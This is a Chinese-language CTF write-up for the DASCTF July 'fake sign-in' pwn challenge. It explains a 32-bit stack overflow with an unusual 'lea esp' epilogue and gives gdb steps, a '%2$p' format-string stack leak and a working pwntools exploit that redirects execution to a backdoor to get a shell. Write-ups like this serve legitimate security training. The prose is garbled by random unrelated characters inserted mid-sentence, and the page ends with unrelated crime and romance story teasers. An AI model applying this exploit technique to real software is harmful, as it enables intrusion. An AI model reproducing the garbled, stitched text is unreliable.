DASCTF七月-虛假的簽到題

總結(jié)分析

這道題是一道簡單的棧溢出漏洞尸疆,但是在leave指令后颗味,利用lea指令給esp賦值別的地址遮婶,導(dǎo)致我們覆蓋到返回地址的地址不能被跳轉(zhuǎn)儒恋。

考點(diǎn):

棧溢出

格式化字符串漏洞


0x1

第一步先查看一下保護(hù)機(jī)制和多少位的程序

checksec? ./qiandao

32位程序只有NX保護(hù)扔進(jìn)IDA觀察


簡單分析

1.main函數(shù)的最后有一個(gè)將ebp轉(zhuǎn)為esp的代碼,如果你棧溢出破壞了ebp黄刚,會(huì)導(dǎo)致[ecx-4]報(bào)錯(cuò)捎谨。

2.leave以后會(huì)修改esp為ecx-4例隆,而ecx的值為ebp-4地址上的值读存。也就是:esp=[ebp-4]-4。

3.因此我們首先需要利用格式化字符漏洞泄漏棧地址剂跟,然后修改ebp-4為我們可控的地址业扒,并且修改該地址-4處的值為backdoor检吆,我們就可以獲得shell了。

詳細(xì)分析

大概了解一下函數(shù)返回時(shí)leave程储、ret蹭沛、lea、mov四條指令的本質(zhì)

1.leave指令相當(dāng)于mov esp,ebp; pop ebp;即恢復(fù)上一個(gè)函數(shù)的棧結(jié)構(gòu)

2.ret指令則相當(dāng)于pop esp;也就是在ebp出棧之后虱肄,esp其實(shí)是指向返回地址的致板,就會(huì)將當(dāng)前棧頂內(nèi)容彈出到eip中進(jìn)行執(zhí)行

3.lea是load effective address的縮寫,簡單的說咏窿,lea指令可以用來將一個(gè)內(nèi)存地址直接賦給目的操作數(shù)斟或,例如:lea eax,[ebx+8]就是將ebx+8這個(gè)值直接賦給eax,而不是把ebx+8處的內(nèi)存地址里的數(shù)據(jù)賦給eax集嵌。

4.而mov指令則恰恰相反萝挤,例如:mov eax,[ebx+8]則是把內(nèi)存地址為ebx+8處的數(shù)據(jù)賦給eax。

再看一下這道題目中函數(shù)調(diào)用結(jié)束的指令:

\bullet 在leave和ret之間執(zhí)行了lea esp,[ecx-4]也就是將esp指向了ecx-4這個(gè)地址根欧,我們看到前面的mov ecx,[ebp+var_4]得知了ecx存放的是ebp+var_4地址上的內(nèi)容怜珍,而var_4是棧上比ebp低四字節(jié)的位置:也就是說esp=[ebp-4]-4。

思路總結(jié)

1.格式化字符串泄露棧地址

2.利用gets修改ebp-4的值為可控地址

3.修改可控地址-4處的值為backdoor

0x2

格式化字符漏洞泄露棧地址

在printf下斷點(diǎn)/進(jìn)行調(diào)試

gdb -q ./qiandao

b printf

r

bbbb

x/20wx 0xffffd040


通過打印0xffffd040處的內(nèi)容的凤粗,發(fā)現(xiàn)了棧偏移為2


0x3


\bullet exp如下

from pwn import *

p = process('./qiandao')

#p = remote('ip',port)

back_addr = 0x0804857d

payload_1 = '%2$p'

p.recvuntil("name:")

p.sendline(payload_1)

p.recvuntil('0x')

stack_ebp = int(p.recv(8),16)

#prinf srack_ebp

stack_ecx = stack_ebp - 4?

p.recvuntil("problem?")

payload_2 = 'a'*32 + p32(back_addr) + p32(stack_ecx)

p.sendline(payload_2)

p.interactive()


0x4

總結(jié)一下心里感受:南上加南酥泛。


推薦其他師傅的wp

Chumen77's Blog? ? ? ?

自留地

ggb0n's Blog

ILIB's Blog

ptr's Blog

starssgo's csdn

此篇文章如果存在問題,還望大佬批評(píng)指正

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市柔袁,隨后出現(xiàn)的幾起案子呆躲,更是在濱河造成了極大的恐慌,老刑警劉巖捶索,帶你破解...
    沈念sama閱讀 212,718評(píng)論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件插掂,死亡現(xiàn)場離奇詭異,居然都是意外死亡腥例,警方通過查閱死者的電腦和手機(jī)辅甥,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,683評(píng)論 3 385
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來燎竖,“玉大人璃弄,你說我怎么就攤上這事」够兀” “怎么了谢揪?”我有些...
    開封第一講書人閱讀 158,207評(píng)論 0 348
  • 文/不壞的土叔 我叫張陵,是天一觀的道長捐凭。 經(jīng)常有香客問我,道長凳鬓,這世上最難降的妖魔是什么茁肠? 我笑而不...
    開封第一講書人閱讀 56,755評(píng)論 1 284
  • 正文 為了忘掉前任,我火速辦了婚禮缩举,結(jié)果婚禮上垦梆,老公的妹妹穿的比我還像新娘。我一直安慰自己仅孩,他們只是感情好托猩,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,862評(píng)論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著辽慕,像睡著了一般京腥。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上溅蛉,一...
    開封第一講書人閱讀 50,050評(píng)論 1 291
  • 那天公浪,我揣著相機(jī)與錄音,去河邊找鬼船侧。 笑死欠气,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的镜撩。 我是一名探鬼主播预柒,決...
    沈念sama閱讀 39,136評(píng)論 3 410
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢(mèng)啊……” “哼!你這毒婦竟也來了宜鸯?” 一聲冷哼從身側(cè)響起憔古,我...
    開封第一講書人閱讀 37,882評(píng)論 0 268
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎顾翼,沒想到半個(gè)月后投放,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,330評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡适贸,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,651評(píng)論 2 327
  • 正文 我和宋清朗相戀三年灸芳,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片拜姿。...
    茶點(diǎn)故事閱讀 38,789評(píng)論 1 341
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡烙样,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出蕊肥,到底是詐尸還是另有隱情谒获,我是刑警寧澤,帶...
    沈念sama閱讀 34,477評(píng)論 4 333
  • 正文 年R本政府宣布壁却,位于F島的核電站批狱,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏展东。R本人自食惡果不足惜赔硫,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 40,135評(píng)論 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望盐肃。 院中可真熱鬧爪膊,春花似錦、人聲如沸砸王。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,864評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽谦铃。三九已至耘成,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間荷辕,已是汗流浹背凿跳。 一陣腳步聲響...
    開封第一講書人閱讀 32,099評(píng)論 1 267
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留疮方,地道東北人控嗜。 一個(gè)月前我還...
    沈念sama閱讀 46,598評(píng)論 2 362
  • 正文 我出身青樓,卻偏偏與公主長得像骡显,于是被迫代替她去往敵國和親疆栏。 傳聞我的和親對(duì)象是個(gè)殘疾皇子曾掂,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,697評(píng)論 2 351